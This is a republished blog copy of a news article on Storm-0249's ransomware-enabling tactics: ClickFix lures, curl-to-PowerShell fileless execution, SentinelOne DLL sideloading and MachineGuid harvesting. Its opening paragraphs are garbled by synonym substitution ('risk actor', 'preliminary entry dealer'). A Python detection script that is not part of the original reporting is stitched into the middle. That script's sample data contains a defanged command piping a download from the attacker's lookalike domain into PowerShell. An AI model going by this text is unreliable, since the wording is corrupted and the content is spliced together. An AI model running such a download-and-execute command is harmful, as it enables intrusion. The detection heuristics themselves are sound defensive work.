Cyber Web Spider Blog – News
Storm-0249 Escalates Ransomware Attacks with ClickFix, Fileless PowerShell, and DLL Sideloading

Posted on December 9, 2025 by CWS

Dec 09, 2025Ravie LakshmananRansomware / Endpoint Safety
The risk actor generally known as Storm-0249 is probably going shifting from its position as an preliminary entry dealer to undertake a mix of extra superior techniques like area spoofing, DLL side-loading, and fileless PowerShell execution to facilitate ransomware assaults.
“These strategies permit them to bypass defenses, infiltrate networks, keep persistence, and function undetected, elevating severe issues for safety groups,” ReliaQuest mentioned in a report shared with The Hacker Information.
Storm-0249 is the moniker assigned by Microsoft to an preliminary entry dealer that has offered footholds into organizations to different cybercrime teams, together with ransomware and extortion actors like Storm-0501. It was first highlighted by the tech large in September 2024.

Then, earlier this year, Microsoft also disclosed details of a phishing campaign mounted by the threat actor that used tax-related themes to target users in the U.S. ahead of the tax filing season and infect them with Latrodectus and the BruteRatel C4 (BRc4) post-exploitation framework.
The end goal of these infections is to obtain persistent access to various enterprise networks and monetize them by selling them to ransomware gangs, providing them with a ready supply of targets and accelerating the pace of such attacks.
The latest findings from ReliaQuest reveal a tactical shift, where Storm-0249 has resorted to using the notorious ClickFix social engineering tactic to trick potential targets into running malicious commands via the Windows Run dialog under the pretext of resolving a technical issue.
In this case, the copied and executed command leverages the legitimate “curl.exe” to fetch a PowerShell script from a URL that mimics a Microsoft domain to give victims a false sense of trust (“sgcipl[.]com/us.microsoft.com/bdo/”) and executes it in a fileless manner via PowerShell.
This, in turn, leads to the execution of a malicious MSI package with SYSTEM privileges, which drops a trojanized DLL associated with SentinelOne's endpoint security solution (“SentinelAgentCore.dll”) into the user's AppData folder along with the legitimate “SentinelAgentWorker.exe” executable.
The idea is to sideload the rogue DLL when the “SentinelAgentWorker.exe” process is launched, allowing the activity to stay undetected. The DLL then establishes encrypted communication with a command-and-control (C2) server.
Storm-0249 has also been observed making use of legitimate Windows administrative utilities like reg.exe and findstr.exe to extract unique system identifiers like MachineGuid to lay the groundwork for follow-on ransomware attacks. The use of living-off-the-land (LotL) techniques, coupled with the fact that these commands are run under the trusted “SentinelAgentWorker.exe” process, means the activity is unlikely to raise any red flags.
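To show what the chain above looks like from the defender's side, here is an added example (not code from ReliaQuest or the article) that runs simple heuristics over constructed process-creation events: the curl-to-PowerShell ClickFix pattern, a URL that carries a Microsoft domain name in its path but not its host, MachineGuid harvesting via reg.exe under a security-agent-named parent, and an agent binary launched from AppData. The event shape, the sample command lines and the rule names are assumptions; the MachineGuid registry location is the standard one under HKLM\SOFTWARE\Microsoft\Cryptography.

```python
import re
from urllib.parse import urlsplit

# Constructed process-creation events (parent image, image path, command line) in the
# shape of Sysmon Event ID 1 / EDR telemetry. Sample values only, not real logs.
SAMPLE_EVENTS = [
    ("explorer.exe", r"C:\Windows\System32\curl.exe",
     "curl.exe -s https://sgcipl[.]com/us.microsoft.com/bdo/ | powershell -"),
    ("msiexec.exe", r"C:\Users\u\AppData\Roaming\SentinelAgentWorker.exe",
     "SentinelAgentWorker.exe"),
    ("SentinelAgentWorker.exe", r"C:\Windows\System32\reg.exe",
     r"reg query HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid"),
    ("cmd.exe", r"C:\Windows\System32\reg.exe",
     r"reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion /v ProgramFilesDir"),
    ("explorer.exe", r"C:\Windows\System32\curl.exe",
     "curl.exe -O https://download.microsoft.com/update.msi"),
]

TRUSTED_DOMAINS = ("microsoft.com",)   # brands whose name in a URL path is suspicious
URL_RE = re.compile(r"https?://\S+")

def lookalike_url(cmdline):
    """True if a URL embeds a trusted brand in its path while the host is someone else."""
    for url in URL_RE.findall(cmdline):
        parts = urlsplit(url.replace("[.]", "."))  # refang defanged sample values
        host = parts.hostname or ""
        for brand in TRUSTED_DOMAINS:
            if brand in parts.path and not host.endswith(brand):
                return True
    return False

def classify(parent, image, cmdline):
    """Return the list of rule names one event triggers (assumed defender heuristics)."""
    hits, exe, low = [], image.rsplit("\\", 1)[-1].lower(), cmdline.lower()
    if exe == "curl.exe" and "powershell" in low:
        hits.append("curl_piped_to_powershell")        # ClickFix-style fileless fetch
    if exe == "curl.exe" and lookalike_url(cmdline):
        hits.append("lookalike_domain_in_path")        # /us.microsoft.com/ on another host
    if exe in ("reg.exe", "findstr.exe") and "machineguid" in low:
        hits.append("machineguid_recon")               # host-ID harvesting before ransomware
        if parent.lower().startswith("sentinelagent"):
            hits.append("recon_under_security_agent")  # LotL hidden behind a trusted name
    if exe.startswith("sentinelagent") and "\\appdata\\" in image.lower():
        hits.append("agent_binary_in_appdata")         # sideload staging outside Program Files
    return hits

def scan(events=SAMPLE_EVENTS):
    """Map event index -> triggered rules, keeping only events that fired something."""
    return {i: classify(*e) for i, e in enumerate(events) if classify(*e)}
```

Benign events (a normal reg query, a download from a real Microsoft host) produce no findings, which is the false-positive check worth keeping when tuning the path-contains-brand rule.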

The findings indicate a departure from mass phishing campaigns to precision attacks that weaponize the trust associated with signed processes for added stealth.
“This isn't just generic reconnaissance – it's preparation for ransomware affiliates,” ReliaQuest said. “Ransomware groups like LockBit and ALPHV use MachineGuid to bind encryption keys to individual victim systems.”
“By tying encryption keys to MachineGuid, attackers ensure that even if defenders capture the ransomware binary or attempt to reverse-engineer the encryption algorithm, they cannot decrypt files without the attacker-controlled key.”
